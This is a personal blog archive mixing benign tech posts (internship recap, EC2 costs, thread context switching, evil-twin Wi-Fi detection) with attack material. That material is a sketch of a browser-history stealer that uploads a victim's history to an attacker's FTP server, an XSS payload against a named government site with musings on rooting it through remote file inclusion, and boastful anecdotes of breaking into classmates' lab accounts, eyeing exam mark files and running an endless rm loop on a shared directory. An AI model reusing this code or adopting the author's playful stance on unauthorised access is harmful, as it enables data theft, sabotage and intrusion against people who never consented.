Category Archives: Computers


I have started writing some malicious code for fun lately. The first one is a Chrome history stealer. As the name suggests, it uploads the history file to a remote FTP server of the attacker’s choice.

Why History?
I believe in this quote:

“Show me a man’s browser history, I will tell you who he (is) (was) (will be)”

Browser history is among the most sensitive information on your computer; it can be as sensitive as a passwd file, simply because of the amount of time people spend on the Internet. Going through someone’s browsing history is like popping open their brain and walking right through it. The whole human thought process can be visualized by examining a browser history.

Okay, you’ve got me watching pr0n, is that it?
Browser history contains far more interesting things to analyze than just whether someone is watching pr0n or not. It is like robbing a car parked in the garage of an unlocked house, instead of going for the whole house. Browser history contains patterns: what you like, what you don’t like. What you do when you are happy, what you do when you are sad. Who you stalk on Facebook, all the shameless ‘How to’s’ you googled for. In fact, this is the pattern Google uses to determine the appropriate ads to display to you. In other words, the Internet’s browsing patterns are worth $42 billion.

The pattern can be used to predict behavior, uncover lies, expose desires, determine knowledge and even more. A wonderful research area would be generating a model from browser history that determines/predicts/asserts the likely actions of the history’s owner.

I decided to write this one in C#, to stay in touch with the language since my first encounter with it last summer. A throwaway free hosting account is all you need to get started. The downside of free hosting was that I could not have a single file of more than 10 MB in size, hence I had to compress the file before uploading.

DISCLAIMER: Do not run this code on a machine without the owner’s permission. For educational purposes only.
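The actual implementation is in C#, but the compress-then-upload step can be sketched in Python for illustration. Everything here is a placeholder: the history path, the archive name, and the FTP details are assumptions, not the post’s real code.

```python
import os
import zipfile
from ftplib import FTP

def compress(history_path):
    """Zip the history file so it fits under the free host's 10 MB cap."""
    archive = history_path + ".zip"
    with zipfile.ZipFile(archive, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(history_path, arcname="History")
    return archive

def upload(archive, host, user, password):
    """Send the compressed archive to the remote FTP drop box."""
    ftp = FTP(host)
    ftp.login(user, password)
    with open(archive, "rb") as f:
        ftp.storbinary("STOR " + os.path.basename(archive), f)
    ftp.quit()
```

The split into two functions mirrors the constraint in the post: compression exists only because of the hosting provider’s file-size limit.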

Here it is: a service that reports how many times your friend changed his picture on Facebook. Thanks to my friend Naveen for changing his picture quite often, which eventually gave birth to this tiny script.

import socket
import feedparser

# Parse the personal FB notification RSS feed and count picture changes
def fbParse():
    cover = 0
    profile = 0
    fbFeed = feedparser.parse('_YOUR_FB_RSS_FEED_URL')
    for post in fbFeed.entries:
        # The embedded snippet was truncated here; matching on the
        # notification title is one plausible way the loop body works
        if 'profile picture' in post.title:
            profile += 1
        elif 'cover photo' in post.title:
            cover += 1
    return profile, cover

An ideal way to do such a task would be to put the Graph API to use, but I wanted to roll out this feature within an hour, since someone had already complained about him changing his picture frequently. It’s all about the timing, no?

This script uses your personal Facebook RSS notification feed, from which items of interest are parsed. Since I didn’t want to hard-code my RSS notification feed URL into a program and distribute it to everyone, I made this a client-server program. The client can be custom-written or a standard utility like netcat.
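The server side of that client-server split could look something like this: a minimal sketch, assuming fbParse returns the two counters and that any TCP client (such as netcat) just reads a plain-text report. The port number is arbitrary; this is not the repository’s actual code.

```python
import socket

def serve(handler, host="0.0.0.0", port=4242, once=False):
    """Answer each TCP connection with the picture-change counts.

    `handler` is assumed to return (profile_changes, cover_changes),
    e.g. the fbParse() function above. A client can simply be:
        nc <host> 4242
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    while True:
        conn, _ = srv.accept()
        profile, cover = handler()
        conn.sendall(("profile changes: %d\ncover changes: %d\n"
                      % (profile, cover)).encode())
        conn.close()
        if once:
            break
    srv.close()
```

Keeping the feed URL on the server is the whole point: clients only ever see the counts, never the private RSS URL.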

For more information on how to get this running, visit the repository.

Happy Hacking!

90 days of Summer

No, not a sequel to the movie ‘500 Days of Summer’. This is about my 3-month internship at TradeHero.

My productivity peaked once again after a very, very long time (read: after 3 years). The last time I was this productive was during my 3rd year at college. It all started with a long journey on 28th May, 2013 from Göteborg to Singapore via Köpenhamn and Zurich.

I reached Singapore on the 29th and navigated myself to the booked accommodation at Jalan Bukit Merah. 30th May was my first day at TradeHero. Ajay was the first one I met; he introduced me to Abert, Tho, Arup, Brendon and everyone else. Julien, Dominic, Gary and Maddy were in the conference room when I came in. After meeting everyone, Julien and Maddy helped me set up the dev environment.

The thing I like most about TradeHero is that they are a lot like Facebook: they have very high goals and they move very fast. It was my first day, and by afternoon I was asked to design a permanent solution for the bug I had found before I joined, and to explain it on the whiteboard, which I duly did. Arup had some questions on the security of the algorithm, which I answered, and Dominic (the CTO) gave the go-ahead.

I was a lot less productive during my first week, thanks to my addiction to vi and nano; it was the first time I had used a proper IDE on a Windows platform since VB6. I got off to a very slow start: .aspx, C#, everything was new to me. If you know me, you would know I was more of a C/C++/Python/PHP/Linux/Apache/AWS guy, but the dev environment at TradeHero was C#/Server/Azure. It was a steep learning curve, and I’m really happy about picking up a couple of languages over the summer.

A couple of weeks into my internship, I was already at my all-time peak commit levels; I reached my longest streak of 8 days, and when people ask me how my internship went, I show them this:

That’s 31,527 lines of code and 62 commits; I think that qualifies my internship experience to be described in some sort of superlative tense.


Quora’s anonymous answers and Facebook Graph Search

The point of an anonymous answering feature is to prevent someone from tracing the answer back to you (perhaps to prevent a flame war, or you getting fired, or God knows what could happen). But if your anonymously written answer gives away enough information, then in combination with a badly configured Facebook profile it can be quite lethal to you.

Let us take this answer as an example. From the question and the answer, anyone can tell that the OP was a student at College of Engineering, Guindy, an ex-employee of Voltas, and a current student at North Carolina State University.

The Facebook Graph Search query below seems to pick out the right individual:

People who studied at College of Engineering, Guindy and worked at Voltas and study at North Carolina State University

It is evident that people are not quite aware of the involuntary privacy leak through their Facebook profiles; there is no reason to make all this information about your grad school and previous employers public. People may say it helps long-lost friends get back in touch, which I agree with, but at what cost?

Facebook Graph Search is a double-edged sword: it can be quite useful, as it was to me when I used it to reunite with a family friend after nearly 14 years of no contact, and equally dangerous, as in the anonymous poster’s case!

ps: This post has nothing to do with my recent outrage against CEG. In fact, I agree with the OP’s answer 🙂

Low-Medium Critical Infrastructure Security

As the Internet says

                              Security is as strong as its weakest link.

While researchers are busy analyzing Stuxnet and Duqu, there exists a wide range of ICS on the Internet with relatively little or almost no security at all. Current research covers only the highly critical targets, while low-to-medium critical targets are almost ignored. I wouldn’t say the researchers’ strategy is wrong; it is the right choice to protect an oil refinery from an intruder rather than the water treatment plant of a golf course. It must be the responsibility of the vendors to protect against such attacks; it doesn’t actually require path-breaking research to protect these (low-to-medium critical) devices. The right architecture and the right configuration are all it takes to secure them.

I don’t know how many would believe me if I said I had seen this thing many times before the news even broke out. It was just hanging around on Shodan. The default password was 100 or 101, I believe, if my memory cells are still intact. One does not need a high-probability NIDS to protect the infrastructure of these devices, since they are hardly targeted by industrial/political espionage or terror attacks. The people who hijack these devices are simple script kiddies or psychopaths.

I’m not saying that the security of low-to-medium critical systems should be taken lightly, but instead of leaving them alone without any protective measures, for the time being I think a few very basic measures by the vendors or the infrastructure admin might keep those script kiddies away.

By basic solutions, I mean:

* Make VPN support available out of the box

* A banner displaying the last login time, IP and hostnames

* Strong passwords

* Clean or deceptive banners; after all, that is how Shodan identifies you

* Strip out legacy services like FTP and SNMP

* A sticker which says “Do not connect this thing to the Internet without a basic VPN” 🙂


MiTM attacks on Open WiFi Hotspots

Since it is so trivial to set up WiFi hotspots as open networks in order to reduce the complexity of the infrastructure, a question arises: how can one remain safe from MiTM attacks, which take advantage of the inherent trust between the connecting client and the access point? As Vivek Ramachandran says in his WiFi security primer video series, there is no way for the client to authenticate the access point it is connecting to.

If you are a novice in wireless security, the first paragraph might sound like a Selvaraghavan movie; I’ll explain how MiTM attacks are performed on open access points [WiFi hotspots, to be precise].

MiTM stands for Man in the Middle attack, or you can use Hak5 Darren’s expansion, Monkey in the Middle attack. In an open network, all the data as well as the 802.11 (WiFi) management packets traveling around you in the air are unencrypted. (The management packets are unencrypted even in WEP and WPA networks, but that’s a different story.)

A few of the management packets are

* Beacon Packet
* Probe Request, Response
* Authentication Request, Response
* Association Request, Response
* Disassociation Request, Response
* Deauthentication Request, Response

In order to perform a MiTM attack, the attacker must make the clients connected to the original AP connect to him instead. He can achieve this by continuously performing a deauth attack on the access point, disconnecting all legitimate clients from the legitimate AP, while using airbase-ng to set up a fake AP with the same name as the legitimate AP, thereby attracting the users to him. The fake AP’s signal strength need not be higher than the legitimate AP’s, because the legitimate AP is being hammered by a continuous deauth attack.

Assume the WiFi hotspot’s network name is freewifi. In the normal case, the client happily connects to the freewifi access point and transfers data.


The attacker starts by sending deauth broadcast management packets for the BSSID of freewifi, making all the clients disconnect from the freewifi access point.

Next, the attacker sets up his own access point named freewifi, but with a different BSSID, using airbase-ng. Since the attacker’s fake AP advertises itself as freewifi, the client goes ahead and connects to it. This is where the client’s inherent trust in the AP is exploited.

Now the client is connected to us, believing we are the freewifi access point, and sends its (unencrypted) data to us. We happily intercept the data, monitor it, and forward it to the Internet through our own uplink, either a 3G phone or a data card. We have the option to tamper with, monitor, or modify the user’s data.

Detecting MiTM Attacks:

So, if we have something on the host (client) computer that verifies the AP’s BSSID (MAC address), it would be easy to detect a MiTM attack. You may think: “MAC spoofing is a piece of cake; what if the attacker launches his duplicate AP with the same BSSID as the legitimate one? The verification mechanism would be rendered useless, right?” My answer is yes, but no. If the attacker gives the fake AP he created with airbase-ng the same BSSID as the legitimate AP’s, he would end up deauthenticating his own fake AP as well, since his deauth frames target that same BSSID. So technically, unless the attacker has a high-gain directional antenna, he will not change the BSSID of his fake AP to match the original AP’s.

Now, I plan to follow this up with a Python daemon that manages a file listing APs along with their BSSIDs. Whenever you connect to a network, it checks whether you have previously connected to that network; if yes, it compares the BSSID, which will differ in the case of a MiTM attack and match in normal usage.
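The core check that daemon would perform can be sketched as a small function over a persisted SSID-to-BSSID map. The file location, JSON format, and function name here are my own placeholders, not the planned daemon itself:

```python
import json
import os

# Placeholder path: where the daemon would persist known networks
KNOWN_APS = os.path.expanduser("~/.known_aps.json")  # {"ssid": "bssid"}

def check_ap(ssid, bssid, db_path=KNOWN_APS):
    """Classify the AP we just associated with.

    Returns 'new'   - first time on this SSID, remember its BSSID
            'ok'    - BSSID matches what we saw before
            'ALERT' - same SSID, different BSSID: possible evil twin
    """
    known = {}
    if os.path.exists(db_path):
        with open(db_path) as f:
            known = json.load(f)
    if ssid not in known:
        known[ssid] = bssid.lower()
        with open(db_path, "w") as f:
            json.dump(known, f)
        return "new"
    if known[ssid] == bssid.lower():
        return "ok"
    return "ALERT"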

Cloud Computing with Amazon EC2

Audience criteria: This article is written for beginners in cloud computing, so if you are a pro I would recommend skipping it.

Cloud dem(y)istified

Wherever I go, I hear people around me using the term cloud computing, but their understanding of the concept is barely minimal. Here is the popular YouTube video which shows how much cloud computing is misunderstood because of its catchy name.

An unorthodox definition of cloud computing would be: “The method of computing in which the physical machine which processes or gathers your data is present in the cloud.” The cloud is nothing but the Internet.

Note: The above definition is completely unorthodox, and you’ll definitely not get 2 marks if you write it as an answer in an Anna University examination.

Example for cloud computing:

Note: This is a very basic example; if you already have a basic idea of the cloud, I would recommend skipping this paragraph.

Knowingly or unknowingly, every one of us uses one or several features of cloud computing in our day-to-day routine. The best and simplest example of a cloud-based service is Gmail. The service offered by Gmail is SaaS [Software as a Service]: Gmail offers its software to people over the cloud. Now let’s do a bit of substitution. What software does Gmail offer? A web-based email client. What is the cloud? The Internet. Substituting the answers to these questions, we get: “Gmail offers its web-based email client over the Internet.” All the emails in your account are physically stored in Google’s data centers, which are in the cloud, i.e. hooked to the Internet, and you access them from your computer via the Internet.

Why Cloud?

I’ll walk you through this question using a case study: Anna University’s results publication. Anna University maintains a web server (at the Ramanujam Computing Center, I guess) for publishing its affiliated colleges’ semester examination results. Everyone experiences the bottleneck effect for at least the first 6 hours after the results are published. Though Anna University hardly cares about this effect, let’s presume Anna University is a more student-friendly university and plans to do something about this bottleneck during results.

The Problem

The problem here is simple to identify: the HTTP requests from ferocious students eagerly expecting their results flood the server’s TCP queue (see DDoS). So a logical solution is to add a load balancer and distribute the requests across some 3 or 4 servers, depending on the results. [Sometimes 3rd to 7th semester results are published at the same time, which definitely needs more than 2 servers to handle the load; on the other hand, sometimes these results are published individually, so 1 or 2 servers would be enough to handle the requests at peak time.]

Solution A, proposed by some leet admin at Anna University:

Buy a load balancer                        –  approx. cost $2000

Lower high-end Core i7 servers with 6 GB RAM × 4   –  $900 × 4 = $3600

Power charges for these machines                –  $xxx

Consolidated cost = $5600 + $xxx per month + network maintenance charges + server upgrade charges  ≈ $7600 per year


Solution B – The cloud way

Rent 2 Extra Large Hi-CPU on-demand instances from the Asia Pacific zone for the first 24 hours  –  $0.76 per hr each

Switch to a Small on-demand instance for the rest of the period  –  $0.095 per hr

EBS storage  –  $0.10 per GB-month. At most our data won’t cross the 10 GB mark, so let’s assume $1/mo

Imagine EBS as a block of storage (an HDD) attached to your instance

Load balancer  –  $0.025/hr

Consolidated cost = $36.48 + $0.60 for each results day, plus $68.4/mo + $1/mo  =  $37.08 per surge day + $69.4/mo

Results are published twice a year, so for 2 days a year we need the 2 Extra Large instances with the load balancer, and for the remaining days a Small instance is enough to handle the traffic.

For a year, the cost = 2 × $37.08 + 12 × $69.4 = $74.16 + $832.8 = $906.96

Solution B can serve the university for 7 to 8 years with the cost spent on Solution A.
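The arithmetic above, spelled out step by step (using the 2011-era rates quoted in this post; real EC2 pricing has changed since):

```python
# Solution A: buy hardware (one-time, rough figures from the post)
load_balancer = 2000
servers = 4 * 900
solution_a_hardware = load_balancer + servers   # + power + maintenance, ~ $7600/yr

# Solution B: rent from EC2
surge_day = 2 * 0.76 * 24 + 0.025 * 24   # 2 XL Hi-CPU instances + load balancer, 24 h
small_month = 0.095 * 720                # one Small instance running ~720 h/month
ebs_month = 1.0                          # <=10 GB of EBS at $0.10 per GB-month
solution_b_year = 2 * surge_day + 12 * (small_month + ebs_month)

print(round(surge_day, 2))        # cost of one results day
print(round(solution_b_year, 2))  # yearly cloud bill
```

Dividing Solution A’s ~$7600 yearly figure by Solution B’s yearly bill is what gives the 7-to-8-years claim.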


Pros of Solution B

  • Tremendous cost savings
  • Completely scalable architecture

“Say the university decides to publish the results for 3rd semester students alone, separately. Under Solution A we can’t save anything, as the hardware is already up and running; but under Solution B we can opt for a Medium Hi-CPU on-demand instance or whatever corresponds, adding and removing capacity in just a few clicks, or even automating the process using Amazon’s API.”

  • Going green. (I don’t want to say more about it in this post.)

Cons of Solution B

  • Remember the Amazon Virginia data center blackout, which pulled several famous sites down along with it. A wise decision would be to host your instances in two different zones, or at least keep a mirrored EBS volume of your instance in some other zone for redundancy.


I’ve been learning “Operating Systems and Systems Programming” online for a while. I use the University of California, Berkeley’s online webcast lectures and Operating Systems Design and Implementation by Andrew S. Tanenbaum as reading material.

I’m blogging here about something that is a simple concept but does complex work underneath.

Multithreading creates the illusion of two or more threads running in parallel. To put it simply, on a single CPU only one thread runs at a time: after a specific threshold time the 1st thread stops and the 2nd thread runs; after another threshold the 2nd thread stops and the 1st resumes, thereby creating the illusion of two threads running at the same time.

I’m diving straight into the topic, as the basic concepts are out of scope for this article.

Here is an extract from Prof. John Kubiatowicz’s slides.

Consider two threads, S and T, with S currently running, and A and B the routines in each thread. After a specific threshold time, some boundary value, or sometimes on receiving an interrupt signal, the running thread (thread S) makes a yield call. The yield returns control of execution to the kernel. The kernel checks for waiting threads, i.e. threads in the runnable state [sometimes based on priority], and makes a call to the switch routine, the sweetest of all.

The switch routine accepts two inputs [the current thread pointer and the new thread pointer]. Its basic functionality: save the current thread’s registers into its TCB, then load the new thread’s saved registers from its TCB into the CPU.

Seems simple enough: the registers of the current thread [thread S] are saved to TCB[tCur].regs.rx, and the new thread’s saved registers TCB[tNew].regs.rx are written into the CPU registers CPU.rx. The overwritten registers include the stack pointer and the return address. After switch does its work, control shifts back to the kernel, and the kernel hands control to the routine whose address is stored in the newly overwritten instruction pointer; in our case, thread T starts running. As instructed by Prof. John Kubiatowicz, I had a look at the nachos source code for switch.
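The save-then-load dance can be modeled in a few lines of Python. This is a toy model of the idea only, not the nachos code: each TCB is just a dict acting as a saved register file, and "registers" is a hypothetical minimal set.

```python
# Toy model of the SWITCH routine: the CPU's registers and each
# thread's TCB are dicts keyed by register name.
CPU = {"eax": 0, "ebx": 0, "esp": 0, "pc": 0}

def switch(t_cur, t_new):
    """Save CPU state into t_cur's TCB, then load t_new's saved state."""
    for reg in CPU:
        t_cur[reg] = CPU[reg]   # TCB[tCur].regs.rx = CPU.rx
    for reg in CPU:
        CPU[reg] = t_new[reg]   # CPU.rx = TCB[tNew].regs.rx
```

Because esp and pc are among the copied "registers", resuming execution with the new values is exactly what makes thread T pick up where it left off.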

Switch.S is written in assembly. It has 4 subroutines [MIPS, SPARC, HP RISC, INTEL], and the subroutine matching the CPU architecture is the one called. I’ll discuss only Intel’s subroutine here.

/* void SWITCH( thread *t1, thread *t2 )
** on entry, stack looks like this:
**      8(esp)  ->              thread *t2
**      4(esp)  ->              thread *t1
**       (esp)  ->              return address
** we push the current eax on the stack so that we can use it as
** a pointer to t1, this decrements esp by 4, so when we use it
** to reference stuff on the stack, we add 4 to the offset.
*/
        .comm   _eax_save,4
        .globl  _SWITCH
_SWITCH:
        movl    %eax,_eax_save          # save the value of eax
        movl    4(%esp),%eax            # move pointer to t1 into eax
        movl    %ebx,_EBX(%eax)         # save registers
        movl    %ecx,_ECX(%eax)
        movl    %edx,_EDX(%eax)
        movl    %esi,_ESI(%eax)
        movl    %edi,_EDI(%eax)
        movl    %ebp,_EBP(%eax)
        movl    %esp,_ESP(%eax)         # save stack pointer
        movl    _eax_save,%ebx          # get the saved value of eax
        movl    %ebx,_EAX(%eax)         # store it
        movl    0(%esp),%ebx            # get return address from stack into ebx
        movl    %ebx,_PC(%eax)          # save it into the pc storage
        movl    8(%esp),%eax            # move pointer to t2 into eax
        movl    _EAX(%eax),%ebx         # get new value for eax into ebx
        movl    %ebx,_eax_save          # save it
        movl    _EBX(%eax),%ebx         # restore old registers
        movl    _ECX(%eax),%ecx
        movl    _EDX(%eax),%edx
        movl    _ESI(%eax),%esi
        movl    _EDI(%eax),%edi
        movl    _EBP(%eax),%ebp
        movl    _ESP(%eax),%esp         # restore stack pointer
        movl    _PC(%eax),%eax          # restore return address into eax
        movl    %eax,4(%esp)            # copy over the ret address on the stack
        movl    _eax_save,%eax
        ret

4(esp) points to thread S and 8(esp) points to thread T. Thread S’s pointer is pulled into eax, and all the registers, viz. ebx, ecx, edx etc., are stored relative to eax; e.g. register ecx gets stored to _ECX(%eax). Then 8(esp) is loaded into eax, and all of thread T’s saved registers are loaded into the CPU registers; e.g. _ECX(%eax) is loaded into %ecx. The return addresses of the two threads are saved and exchanged respectively.

ps: The diagrams were taken from Prof. John Kubiatowicz’s slides.

University Lab Fun (in)security

As an ex-electrical-engineering student, I didn’t have the opportunity to take many computer science lab courses, as neither the coursework nor the electives were flexible.

You know it, right? It’s ANNA UNIVERSITY.

But, thanks to the IT boom, I had:

  • Fundamentals of Computer Lab
  • Data Structures Lab
  • Object Oriented Programming Lab
  • Communication Lab [English]
  • Power System Simulation Lab

Let me walk you through the fun stuff I/we had during these labs.

Fundamentals of Computer Lab:

As I was a fresher, I stayed below the radar and didn’t try anything adventurous, so it typically went like normal lab sessions.

Data Structures Lab:

The lab was entirely based on C. We were given a unique user id and password, which was merely our roll number [ee199 is mine]; sadly there was no provision to change the default password. The user id and password were for mounting user-specific directories onto the system, so that students could store their programs on their respective shares. As I was a sophomore at that time, I limited myself to logging into other users’ accounts and deleting their programs, nothing more than that, because I was a bit of a coward at that time. Yeah, you read it right: I was a coward at THAT TIME.

Object Oriented Programming Lab:

We did C++ and Java. It was my third year, and I was peaking in presentations and coding competitions. The only difference between the data structures lab and the OOP lab setup was the GUI: we had access to Windows ME machines in the OOP lab, whereas in the DSA (Data Structures and Algorithms) lab we were given DOS and Turbo C. The storage part was lamer than the previous lab, as the programs were saved in the /bin/ directory of the C drive, and guess what, the C drives were shared over the network. So I just had to browse to a specific user’s bin directory [//system22/c/] and change his/her programs to some random shit, like displaying weird characters on the screen in different colors in an infinite loop.

Later on, however, they [the system admins] were smart enough to change the program storage/execution directory to an NFS share, which got mounted at login time. But they were not smart enough to change the server’s password to anything other than “peccc5lab”, so my job became easier: Start -> Run -> //cc5server/c$/eee would list all users’ directories from ee101 to ee230, where their programs were stored. Pwnd!

Communication Lab [English]:

It was held in the same laboratory as OOP, and it was the lamest lab I had. It was something similar to the TOEFL exam: the questions were generated from a database, and the database file luckily lived on the cc5server which I mentioned above, so I was able to change the questions to anything I wanted. The funniest part was that I could have even done the same for the university exams. The procedure was to send the users database file, with the marks recorded according to the answers given, to Anna University. Before the university exam, I had the opportunity to view the users.mdb file [//cc5server/c$/exam/users.mdb]; surprisingly, the marks were encrypted. I thought of copying the encrypted value of my class topper’s marks over mine, but what if the marks were encrypted with the roll number as the key? If I had swapped my marks, they wouldn’t have deciphered correctly, and I would have landed in a lot of trouble! So I refrained from doing it. I even tried to take a look at the .asp file which pulls the questions and reports the answers back, but time didn’t permit it, and the staff walking around the lab were watching me as if I were an alien.

Other than this, I used to cause havoc between students using net send commands. It was a simple trick: as the C drives were shared, I used to change the autoexec.bat of system-y to something like

  • @echo off
  • net send system-x hey as***le !
  • start c:\elclient.exe

and change the shortcut link for the EL client to open the autoexec.bat file. So when the user on system-y opened his EL client, system-x would receive a message saying “as***le!” sent from system-y. It was fun to watch the users on system-x and system-y fight with each other.

Ps: The EL client is the software we were supposed to work in; I hardly opened it.

Power System Simulation Lab:

I have already blogged about this; you can check it here.

Operating Systems Lab at SVCE:

Thanks to Jump Start 2 for bringing back the fun part again. This time it was the OS lab, and we were taught basic Linux commands like ls, chmod, cat, editors [vi] [for some reason the instructor never mentioned emacs; emacs FTW], and some pretty basic stuff. It was easy for me. No, I’m not blaming the instructor: they had to cover each and every student, and many of them had no idea about either Linux and computers or the Rankine cycle, though they used to brag that they were the mec*sterz, meh. But she [the instructor] did not ask me to close my terminal, in which I was teaching my friend about grep and pipes. Never mind. In the exercise, each user was asked to create files in their home directory, i.e. exam01; exam01 was the username given to 90% of the users in that session. Again it was an NFS [Network File System], and as the files created by each user started appearing in every user’s home directory, some mothafucka created files with filenames that hurt my friend. So the evil inside BORIS stepped out to cook a bash script []

	for (( ; ; )); do
		rm /exam/exam01/*
		sleep 60
	done

chmod a+x

../ &

and the charming script ran in the background, deleting every file users created to learn in that lab. I’m now guilty of making the OS lab unusable for everyone; I wouldn’t have done it if the file names were not that rude.

Ps: If you are creating a lab environment for students, better rely on NFS with different passwords per user, or share less of the local system disk with limited user privileges.

Pps: Try these at your own risk.

That’s it for now. I’m tired of typing since 6:30 pm, and now the time is 9:09 pm. Thanks to Vignesh for editing this post.

Goodbye, alvida!

NASA has it, And so Does DRDO

NASA has it, the FBI has it, most government agencies/organizations have it, and DRDO has it too. What is it?

Well, that’s the most common security flaw in web applications: “THE XSS (Cross Site Scripting)”. XSS vulnerabilities are due to improper sanitization, or a complete lack of it, of input variables in server-side scripts, which allows external or embedded JavaScript to execute in the client-side browser.
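The defense is the mirror image of the flaw: encode user input before echoing it into the page. The vulnerable page here is JSP, so the following Python sketch is only an illustration of the idea, not DRDO’s code; the function name is mine.

```python
import html

def render_param(pg):
    """Encode <, >, &, and quotes before echoing the 'pg' value into
    the page, so an injected <script> tag renders as inert text."""
    return html.escape(pg)

print(render_param("<script>alert('XSS is here');</script>"))
```

With encoding in place, the payload from the vulnerable URL below comes back as harmless entity-escaped text instead of executing in the browser.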

Vulnerable URL: <script>alert('XSS is here');</script>

The vulnerability lies in the index.jsp page: the variable “pg” is not properly sanitized, which is why it allows arbitrary JavaScript to be included. The good news is that it does not allow remote JavaScript to run.<SCRIPT/XSS SRC=""></SCRIPT>

The above script will not work because the administrator at DRDO was smart enough to set the REMOTE INCLUDE option [something like that, I forgot the exact name] to DISALLOW in the Apache server configuration, which is why only scripts within the host directory will run.

If the above [remote include] setting had not been made, another serious vulnerability would have been induced: RFI [Remote File Inclusion].

From the above URLs it is pretty obvious that index.jsp’s pg variable includes the local JSP page [awards.jsp/Director.jsp] in the frame. So if the remote include feature had been on, we could have uploaded a JSP shell script to our own server and included it inside index.jsp,

so that it would get executed on DRDO’s server, and w00t, DRDO would have been r00t’ed.

This vulnerability was reported to keeda/null on 17-10-10.